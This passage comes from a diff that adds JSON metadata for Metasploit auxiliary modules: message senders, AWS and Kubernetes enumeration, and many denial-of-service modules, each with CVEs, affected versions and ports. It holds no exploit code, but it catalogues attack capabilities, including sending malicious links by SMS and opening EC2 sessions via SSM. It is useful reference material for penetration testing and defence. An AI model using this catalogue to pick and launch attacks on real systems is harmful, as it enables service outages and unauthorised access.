"ref_name": "bnat/bnat_scan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/hwbridge/connect": { + "name": "Hardware Bridge Session Connector", + "fullname": "auxiliary/client/hwbridge/connect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Craig Smith" + ], + "description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect the physical HWBridge which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. After that module has started, pass the HWBRIDGE_BASE_URL\n options to this connector module.", + "references": [ + "URL-https://web.archive.org/web/20170206145056/http://opengarages.org/hwbridge/" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/hwbridge/connect.rb", + "is_install_path": true, + "ref_name": "client/hwbridge/connect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/iec104/iec104": { + "name": "IEC104 Client Utility", + "fullname": "auxiliary/client/iec104/iec104", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Michael John " + ], + "description": "This module allows sending 104 commands.", + "references": [], + "platform": "", + "arch": "", + "rport": 2404, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/iec104/iec104.rb", + "is_install_path": true, + "ref_name": "client/iec104/iec104", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "SEND_COMMAND", + "description": "Send command to device" + } + ] + }, + "auxiliary_client/mms/send_mms": { + "name": "MMS Client", + "fullname": "auxiliary/client/mms/send_mms", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sinn3r " + ], + "description": "This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/mms/send_mms.rb", + "is_install_path": true, + "ref_name": "client/mms/send_mms", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/sms/send_text": { + "name": "SMS Client", + "fullname": "auxiliary/client/sms/send_text", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sinn3r " + ], + "description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/sms/send_text.rb", + "is_install_path": true, + "ref_name": "client/sms/send_text", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/smtp/emailer": { + "name": "Generic Emailer (SMTP)", + "fullname": "auxiliary/client/smtp/emailer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "et " + ], + "description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.", + "references": [ + "URL-http://spl0it.org/" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2025-05-04 23:26:52 +0000", + "path": "/modules/auxiliary/client/smtp/emailer.rb", + "is_install_path": true, + "ref_name": "client/smtp/emailer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_client/telegram/send_message": { + "name": "Telegram Message Client", + "fullname": "auxiliary/client/telegram/send_message", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ege Balcı ", + "Gaurav Purswani" + ], + "description": "This module can be used to send a document and/or message to\n multiple chats on telegram. Please refer to the module\n documentation for info on how to retrieve the bot token and corresponding chat\n ID values.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:04:17 +0000", + "path": "/modules/auxiliary/client/telegram/send_message.rb", + "is_install_path": true, + "ref_name": "client/telegram/send_message", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_ec2": { + "name": "Amazon Web Services EC2 instance enumeration", + "fullname": "auxiliary/cloud/aws/enum_ec2", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Aaron Soto ", + "RageLtMan " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all EC2 instances associated\n with the account", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-06 22:49:03 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_ec2.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_ec2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_iam": { + "name": "Amazon Web Services IAM credential enumeration", + "fullname": "auxiliary/cloud/aws/enum_iam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Aaron Soto " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all IAM credentials associated\n with the account", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-06 22:49:03 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_iam.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_iam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_s3": { + "name": "Amazon Web Services S3 instance enumeration", + "fullname": "auxiliary/cloud/aws/enum_s3", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Aaron Soto " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-06 22:49:03 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_s3.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_s3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/aws/enum_ssm": { + "name": "Amazon Web Services EC2 SSM enumeration", + "fullname": "auxiliary/cloud/aws/enum_ssm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "RageLtMan " + ], + "description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all SSM-enabled EC2 instances\n accessible to the account. Once enumerated as SSM-enabled, the\n instances can be controlled using out-of-band WebSocket sessions\n provided by the AWS API (nominally, privileged out of the box).\n This module provides not only the API enumeration identifying EC2\n instances accessible via SSM with given credentials, but enables\n session initiation for all identified targets (without requiring\n target-level credentials) using the CreateSession datastore option.\n The module also provides an EC2 ID filter and a limiting throttle\n to prevent session stampedes or expensive messes.", + "references": [ + "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-06-03 11:02:15 +0000", + "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb", + "is_install_path": true, + "ref_name": "cloud/aws/enum_ssm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_cloud/kubernetes/enum_kubernetes": { + "name": "Kubernetes Enumeration", + "fullname": "auxiliary/cloud/kubernetes/enum_kubernetes", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "alanfoster", + "Spencer McIntyre" + ], + "description": "Enumerate a Kubernetes API to report useful resources such as available namespaces,\n pods, secrets, etc.\n\n Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-10-07 12:35:53 +0000", + "path": "/modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb", + "is_install_path": true, + "ref_name": "cloud/kubernetes/enum_kubernetes", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "all", + "description": "enumerate all resources" + }, + { + "name": "auth", + "description": "enumerate auth" + }, + { + "name": "namespace", + "description": "enumerate namespace" + }, + { + "name": "namespaces", + "description": "enumerate namespaces" + }, + { + "name": "pod", + "description": "enumerate pod" + }, + { + "name": "pods", + "description": "enumerate pods" + }, + { + "name": "secret", + "description": "enumerate secret" + }, + { + "name": "secrets", + "description": "enumerate secrets" + }, + { + "name": "version", + "description": "enumerate version" + } + ] + }, + "auxiliary_crawler/msfcrawler": { + "name": "Metasploit Web Crawler", + "fullname": "auxiliary/crawler/msfcrawler", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "et " + ], + "description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-04-02 15:48:42 +0000", + "path": "/modules/auxiliary/crawler/msfcrawler.rb", + "is_install_path": true, + "ref_name": "crawler/msfcrawler", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/android/android_stock_browser_iframe": { + "name": "Android Stock Browser Iframe DOS", + "fullname": "auxiliary/dos/android/android_stock_browser_iframe", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-12-01", + "type": "auxiliary", + "author": [ + "Jean Pascal Pereira", + "Jonathan Waggoner" + ], + "description": "This module exploits a vulnerability in the native browser that comes with Android 4.0.3.\n If successful, the browser will crash after viewing the webpage.", + "references": [ + "PACKETSTORM-118539", + "CVE-2012-6301" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb", + "is_install_path": true, + "ref_name": "dos/android/android_stock_browser_iframe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": { + "name": "iOS Safari Denial of Service with CSS", + "fullname": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-09-15", + "type": "auxiliary", + "author": [ + "Sabri Haddouche" + ], + "description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.", + "references": [ + "URL-https://twitter.com/pwnsdx/status/1040944750973595649", + "URL-http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea", + "URL-https://nbulischeck.github.io/apple-safari-crash" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", + "is_install_path": true, + "ref_name": "dos/apple_ios/webkit_backdrop_filter_blur", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/cisco_7937g_dos": { + "name": "Cisco 7937G Denial-of-Service Attack", + "fullname": "auxiliary/dos/cisco/cisco_7937g_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-02", + "type": "auxiliary", + "author": [ + "Cody Martin" + ], + "description": "This module exploits a bug in how the conference station \n\thandles incoming SSH connections that provide an incompatible \n\tkey exchange. By connecting with an incompatible key exchange, \n\tthe device becomes nonresponsive until it is manually power\n\tcycled.", + "references": [ + "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", + "CVE-2020-16138" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-08-21 13:13:33 +0000", + "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos.py", + "is_install_path": true, + "ref_name": "dos/cisco/cisco_7937g_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/cisco_7937g_dos_reboot": { + "name": "Cisco 7937G Denial-of-Service Reboot Attack", + "fullname": "auxiliary/dos/cisco/cisco_7937g_dos_reboot", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-02", + "type": "auxiliary", + "author": [ + "Cody Martin" + ], + "description": "This module exploits a bug in how the conference station handles \n\texecuting a ping via its web interface. By repeatedly executing \n\tthe ping function without clearing out the resulting output, \n\ta DoS is caused that will reset the device after a few minutes.", + "references": [ + "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", + "CVE-2020-16139" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-08-21 09:01:45 +0000", + "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py", + "is_install_path": true, + "ref_name": "dos/cisco/cisco_7937g_dos_reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/ios_http_percentpercent": { + "name": "Cisco IOS HTTP GET /%% Request Denial of Service", + "fullname": "auxiliary/dos/cisco/ios_http_percentpercent", + "aliases": [], + "rank": 300, + "disclosure_date": "2000-04-26", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.", + "references": [ + "BID-1154", + "CVE-2000-0380", + "OSVDB-1302" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb", + "is_install_path": true, + "ref_name": "dos/cisco/ios_http_percentpercent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/cisco/ios_telnet_rocem": { + "name": "Cisco IOS Telnet Denial of Service", + "fullname": "auxiliary/dos/cisco/ios_telnet_rocem", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-17", + "type": "auxiliary", + "author": [ + "Artem Kondratenko" + ], + "description": "This module triggers a Denial of Service condition in the Cisco IOS\n telnet service affecting multiple Cisco switches. Tested against Cisco\n Catalyst 2960 and 3750.", + "references": [ + "BID-96960", + "CVE-2017-3881", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", + "URL-https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution" + ], + "platform": "", + "arch": "", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb", + "is_install_path": true, + "ref_name": "dos/cisco/ios_telnet_rocem", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dhcp/isc_dhcpd_clientid": { + "name": "ISC DHCP Zero Length ClientID Denial of Service Module", + "fullname": "auxiliary/dos/dhcp/isc_dhcpd_clientid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sid", + "theLightCosine " + ], + "description": "This module performs a Denial of Service Attack against the ISC DHCP server,\n versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request\n message with a 0-length client_id option for an IP address on the appropriate range\n for the dhcp server. When ISC DHCP Server tries to hash this value it exits\n abnormally.", + "references": [ + "CVE-2010-2156", + "OSVDB-65246", + "EDB-14185" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-03-05 03:38:51 +0000", + "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb", + "is_install_path": true, + "ref_name": "dos/dhcp/isc_dhcpd_clientid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dns/bind_tkey": { + "name": "BIND TKEY Query Denial of Service", + "fullname": "auxiliary/dos/dns/bind_tkey", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-07-28", + "type": "auxiliary", + "author": [ + "Jonathan Foote", + "throwawayokejxqbbif", + "wvu " + ], + "description": "This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.", + "references": [ + "CVE-2015-5477", + "URL-http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/", + "URL-https://kb.isc.org/article/AA-01272" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/dos/dns/bind_tkey.rb", + "is_install_path": true, + "ref_name": "dos/dns/bind_tkey", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dns/bind_tsig": { + "name": "BIND TSIG Query Denial of Service", + "fullname": "auxiliary/dos/dns/bind_tsig", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-09-27", + "type": "auxiliary", + "author": [ + "Martin Rocha", + "Ezequiel Tavella", + "Alejandro Parodi", + "Infobyte Research Team" + ], + "description": "A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.", + "references": [ + "CVE-2016-2776", + "URL-http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/dns/bind_tsig.rb", + "is_install_path": true, + "ref_name": "dos/dns/bind_tsig", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/dns/bind_tsig_badtime": { + "name": "BIND TSIG Badtime Query Denial of Service", + "fullname": "auxiliary/dos/dns/bind_tsig_badtime", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-05-19", + "type": "auxiliary", + "author": [ + "Tobias Klein", + "Shuto Imai" + ], + "description": "A logic error in code which checks TSIG validity can be used to\n trigger an assertion failure in tsig.c.", + "references": [ + "CVE-2020-8617", + "URL-https://gitlab.isc.org/isc-projects/bind9/-/issues/1703", + "URL-https://www.trapkit.de/advisories/TKADV2020-002.txt" + ], + "platform": "", + "arch": "", + "rport": 53, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb", + "is_install_path": true, + "ref_name": "dos/dns/bind_tsig_badtime", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/freebsd/nfsd/nfsd_mount": { + "name": "FreeBSD Remote NFS RPC Request Denial of Service", + "fullname": "auxiliary/dos/freebsd/nfsd/nfsd_mount", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module sends a specially-crafted NFS Mount request causing a\n kernel panic on host running FreeBSD 6.0.", + "references": [ + "BID-16838", + "OSVDB-23511", + "CVE-2006-0900" + ], + "platform": "", + "arch": "", + "rport": 2049, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb", + "is_install_path": true, + "ref_name": "dos/freebsd/nfsd/nfsd_mount", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/ftp/vsftpd_232": { + "name": "VSFTPD 2.3.2 Denial of Service", + "fullname": "auxiliary/dos/ftp/vsftpd_232", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-03", + "type": "auxiliary", + "author": [ + "Nick Cottrell (Rad10Logic) ", + "Anna Graterol ", + "Mana Mostaani ", + "Maksymilian Arciemowicz" + ], + "description": "This module triggers a Denial of Service condition in the VSFTPD server in\n versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.", + "references": [ + "BID-46617", + "CVE-2011-0762", + "EDB-16270" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2023-05-25 21:21:49 +0000", + "path": "/modules/auxiliary/dos/ftp/vsftpd_232.rb", + "is_install_path": true, + "ref_name": "dos/ftp/vsftpd_232", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/hp/data_protector_rds": { + "name": "HP Data Protector Manager RDS DOS", + "fullname": "auxiliary/dos/hp/data_protector_rds", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-08", + "type": "auxiliary", + "author": [ + "Roi Mallo ", + "sinn3r " + ], + "description": "This module causes a remote DOS on HP Data Protector's RDS service. By sending\n a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous\n size for malloc().", + "references": [ + "CVE-2011-0514", + "OSVDB-70617", + "EDB-15940" + ], + "platform": "", + "arch": "", + "rport": 1530, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/hp/data_protector_rds.rb", + "is_install_path": true, + "ref_name": "dos/hp/data_protector_rds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/3com_superstack_switch": { + "name": "3Com SuperStack Switch Denial of Service", + "fullname": "auxiliary/dos/http/3com_superstack_switch", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-06-24", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.", + "references": [ + "OSVDB-7246", + "CVE-2004-2691", + "URL-http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb", + "is_install_path": true, + "ref_name": "dos/http/3com_superstack_switch", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/apache_commons_fileupload_dos": { + "name": "Apache Commons FileUpload and Apache Tomcat DoS", + "fullname": "auxiliary/dos/http/apache_commons_fileupload_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-06", + "type": "auxiliary", + "author": [ + "Unknown", + "ribeirux" + ], + "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.", + "references": [ + "CVE-2014-0050", + "URL-https://tomcat.apache.org/security-8.html", + "URL-https://tomcat.apache.org/security-7.html" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/apache_commons_fileupload_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/apache_mod_isapi": { + "name": "Apache mod_isapi Dangling Pointer", + "fullname": "auxiliary/dos/http/apache_mod_isapi", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-05", + "type": "auxiliary", + "author": [ + "Brett Gervasoni", + "jduck " + ], + "description": "This module triggers a use-after-free vulnerability in the Apache\n Software Foundation mod_isapi extension for versions 2.2.14 and earlier.\n In order to reach the vulnerable code, the target server must have an\n ISAPI module installed and configured.\n\n By making a request that terminates abnormally (either an aborted TCP\n connection or an unsatisfied chunked request), mod_isapi will unload the\n ISAPI extension. Later, if another request comes for that ISAPI module,\n previously obtained pointers will be used resulting in an access\n violation or potentially arbitrary code execution.\n\n Although arbitrary code execution is theoretically possible, a\n real-world method of invoking this consequence has not been proven. In\n order to do so, one would need to find a situation where a particular\n ISAPI module loads at an image base address that can be re-allocated by\n a remote attacker.\n\n Limited success was encountered using two separate ISAPI modules. In\n this scenario, a second ISAPI module was loaded into the same memory\n area as the previously unloaded module.", + "references": [ + "CVE-2010-0425", + "OSVDB-62674", + "BID-38494", + "URL-https://bz.apache.org/bugzilla/show_bug.cgi?id=48509", + "URL-https://web.archive.org/web/20100715032229/http://www.gossamer-threads.com/lists/apache/cvs/381537", + "URL-http://www.senseofsecurity.com.au/advisories/SOS-10-002", + "EDB-11650" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": 